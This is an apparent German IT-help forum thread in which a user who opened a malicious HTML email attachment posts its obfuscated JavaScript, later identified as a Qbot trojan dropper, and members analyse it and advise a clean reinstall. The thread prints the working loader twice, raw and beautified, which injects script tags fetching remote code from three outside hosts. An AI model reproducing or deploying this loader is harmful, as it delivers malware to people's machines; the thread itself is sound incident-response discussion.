nullchecker
Goto Top

HTML Javascript Schadcode?

Hallo Leute

wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.

<script type="text/javascript">  
		var a0gaxemmamnmai=a0auopbttselaeva;(function(paltvonousn,molssurosiumdpo){var aqsupimi=a0auopbttselaeva,lnpmaguiac=paltvonousn();while(!![]){try{var uaamumatquindlail=parseInt(aqsupimi(0xc8))/0x1*(parseInt(aqsupimi(0xc7))/0x2)+parseInt(aqsupimi(0xc3))/0x3+parseInt(aqsupimi(0xc1))/0x4+-parseInt(aqsupimi(0xc6))/0x5+-parseInt(aqsupimi(0xc4))/0x6+-parseInt(aqsupimi(0xbf))/0x7*(-parseInt(aqsupimi(0xc5))/0x8)+-parseInt(aqsupimi(0xcf))/0x9;if(uaamumatquindlail===molssurosiumdpo)break;else lnpmaguiac['push'](lnpmaguiac['shift']());}catch(sdasenectuear){lnpmaguiac['push'](lnpmaguiac['shift']());}}}(a0pcuisssitint,0x9c462));function a0auopbttselaeva(pcuisssitint,auopbttselaeva){var paltvonousn=a0pcuisssitint();return a0auopbttselaeva=function(molssurosiumdpo,lnpmaguiac){molssurosiumdpo=molssurosiumdpo-0xbd;var uaamumatquindlail=paltvonousn[molssurosiumdpo];return uaamumatquindlail;},a0auopbttselaeva(pcuisssitint,auopbttselaeva);}var voluptatemrerum=[a0gaxemmamnmai(0xc2)+'nseg.com/qu/qu'+a0gaxemmamnmai(0xcc),'https://ksaa-e'+a0gaxemmamnmai(0xbe)+a0gaxemmamnmai(0xbd)+'2',a0gaxemmamnmai(0xd1)+a0gaxemmamnmai(0xca)+a0gaxemmamnmai(0xcd)+a0gaxemmamnmai(0xc0)+'5111'];function a0pcuisssitint(){var tboeurldsoi=['osscommunicati','appendChild','.php?14652','onservices.com','script','8538543FFQfSE','createElement','https://youngb','/enqu.php?2954','vents.com/enqu','8781570gbVRZg','/aua/aua.php?3','4856144NrAgbj','https://horizo','387975mYIIKZ','2511780PInbUf','8XBKhBs','6018945WNxSPK','12146zVqPWt','101AYDIcr','src'];a0pcuisssitint=function(){return tboeurldsoi;};return a0pcuisssitint();}for(var occaecatiestnesciunt in voluptatemrerum){var rem=document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));rem[a0gaxemmamnmai(0xc9)]=voluptatemrerum[occaecatiestnesciunt],document['head'][a0gaxemmamnmai(0xcb)](rem);}  
</script>

Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?

Content-Key: 6465992526

Url: https://administrator.de/contentid/6465992526

Printed on: May 20, 2024 at 15:05 o'clock

Mitglied: 3063370895
3063370895 Mar 22, 2023 updated at 18:06:34 (UTC)
Goto Top
Hi,

Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..

weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..
Member: Fennek11
Fennek11 Mar 22, 2023, updated at Mar 23, 2023 at 00:30:26 (UTC)
Goto Top
Hier nach dem "Beautifier":

<script type = "text/javascript" >  
    var a0gaxemmamnmai = a0auopbttselaeva;
(function(paltvonousn, molssurosiumdpo) {
    var aqsupimi = a0auopbttselaeva,
        lnpmaguiac = paltvonousn();
    while (!![]) {
        try {
            var uaamumatquindlail = parseInt(aqsupimi(0xc8)) / 0x1 * (parseInt(aqsupimi(0xc7)) / 0x2) + parseInt(aqsupimi(0xc3)) / 0x3 + parseInt(aqsupimi(0xc1)) / 0x4 + -parseInt(aqsupimi(0xc6)) / 0x5 + -parseInt(aqsupimi(0xc4)) / 0x6 + -parseInt(aqsupimi(0xbf)) / 0x7 * (-parseInt(aqsupimi(0xc5)) / 0x8) + -parseInt(aqsupimi(0xcf)) / 0x9;
            if (uaamumatquindlail === molssurosiumdpo) break;
            else lnpmaguiac['push'](lnpmaguiac['shift']());  
        } catch (sdasenectuear) {
            lnpmaguiac['push'](lnpmaguiac['shift']());  
        }
    }
}(a0pcuisssitint, 0x9c462));

function a0auopbttselaeva(pcuisssitint, auopbttselaeva) {
    var paltvonousn = a0pcuisssitint();
    return a0auopbttselaeva = function(molssurosiumdpo, lnpmaguiac) {
        molssurosiumdpo = molssurosiumdpo - 0xbd;
        var uaamumatquindlail = paltvonousn[molssurosiumdpo];
        return uaamumatquindlail;
    }, a0auopbttselaeva(pcuisssitint, auopbttselaeva);
}
var voluptatemrerum = [a0gaxemmamnmai(0xc2) + 'nseg.com/qu/qu' + a0gaxemmamnmai(0xcc), 'https://ksaa-e' + a0gaxemmamnmai(0xbe) + a0gaxemmamnmai(0xbd) + '2', a0gaxemmamnmai(0xd1) + a0gaxemmamnmai(0xca) + a0gaxemmamnmai(0xcd) + a0gaxemmamnmai(0xc0) + '5111'];  

function a0pcuisssitint() {
    var tboeurldsoi = ['osscommunicati', 'appendChild', '.php?14652', 'onservices.com', 'script', '8538543FFQfSE', 'createElement', 'https://youngb', '/enqu.php?2954', 'vents.com/enqu', '8781570gbVRZg', '/aua/aua.php?3', '4856144NrAgbj', 'https://horizo', '387975mYIIKZ', '2511780PInbUf', '8XBKhBs', '6018945WNxSPK', '12146zVqPWt', '101AYDIcr', 'src'];  
    a0pcuisssitint = function() {
        return tboeurldsoi;
    };
    return a0pcuisssitint();
}
for (var occaecatiestnesciunt in voluptatemrerum) {
    var rem = document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));
    rem[a0gaxemmamnmai(0xc9)] = voluptatemrerum[occaecatiestnesciunt], document['head'][a0gaxemmamnmai(0xcb)](rem);  
} < /script>
Member: Fennek11
Fennek11 Mar 23, 2023 at 09:02:10 (UTC)
Goto Top
Der dritte link wird von Kaspersky als "malicous" eingestuft.

https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary

Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Mitglied: 3063370895
3063370895 Mar 23, 2023 at 09:04:09 (UTC)
Goto Top
Zitat von @Fennek11:

Der dritte link wird von Kaspersky als "malicous" eingestuft.

https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary

Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.


Zitat von @chaot1coz:
Stage 2: https://pastebin.com/AriyCjZ1
Member: nullchecker
nullchecker Mar 23, 2023 at 10:24:30 (UTC)
Goto Top
Erst einemal vielen an Euch.

Was sollte ich jetzt tun und wie werde ich das Ding wieder los
Mitglied: 3063370895
3063370895 Mar 23, 2023 at 10:25:53 (UTC)
Goto Top
Wenn du absolute Sicherheit willst, Alles platt machen, Windows neu installieren und Daten vom Backup wieder einspielen. Alles andere wäre als Vorschlag unseriös.
Member: nullchecker
nullchecker Mar 23, 2023 at 10:38:51 (UTC)
Goto Top
Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Mitglied: 6247018886
6247018886 Mar 23, 2023 updated at 10:53:20 (UTC)
Goto Top
Zitat von @nullchecker:

Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Im Endeffekt kann das Teil alles machen. Über eine Remote-Shell die mit dem CC Server in Kontakt steht kannst du nachladen was du gerade brauchst.
Platt machen und Kennwörter von den kritischsten Accounts sicherheitshalber ändern ist Pflichtprogramm bei unbekannten Infektionen.
Member: nullchecker
nullchecker Mar 23, 2023 at 11:04:33 (UTC)
Goto Top
Würde der Kaspersy das nachladen bemerken.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Mitglied: 6247018886
6247018886 Mar 23, 2023 updated at 11:16:21 (UTC)
Goto Top
Zitat von @nullchecker:

Würde der Kaspersy das nachladen bemerken.
Würde ich mich nicht drauf verlassen. Das wird oft über Windows-Prozesse getarnt.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Gibt es unterschiedliche Vorgehensweisen, meistens kontaktiert der Client einen CC (Command & Control Server) in zeitlichen Abständen, welcher meistens verschlüsselte Anweisungen für den Client abgelegt hat und die der Client dann ausführt. Das kann sogar durch getarnte DNS-Abfragen geschehen so das es noch weniger auffällt, oder durch zur Laufzeit injizierte JavaScripts im Browser etc. pp.
Member: nullchecker
nullchecker Mar 24, 2023 at 09:13:40 (UTC)
Goto Top
Vielen Dank für die Infos.
Werde auf Kurz oder Lan das Sxstem neu aufsetzen.
Member: nullchecker
nullchecker Apr 12, 2023 at 10:36:03 (UTC)
Goto Top
Hallo,
ich wollte hier nur noch eine kurze Rückmeldung geben.
Ich habe mit dem Support von Kaspersky (den hab ich als Virenscanner) Kontakt aufgenommen, und die haben mir mitgeteilt, dass das Skript von Rerum.html seit 17.03 von Kaspersky blockiert wird. Das Skript wird als HEUR:Trojan-Dropper.Script.Qbot.gen von Kaspersky geblockt.
Ich habe von Kas. und Mbar (Malwarebytes Anti-Rootkit ewiglange Scans laufen lassen und die haben nichts gefunden. Von daher gehe ich davon aus dass ich nochmal mit einem blauen Auge davongekommen bin.
Nichtsdestotrotz werde ich bei gelegenheit eine neue Maschine aufsetzen.

Euch nochmals vielen Dank für die Unterstützung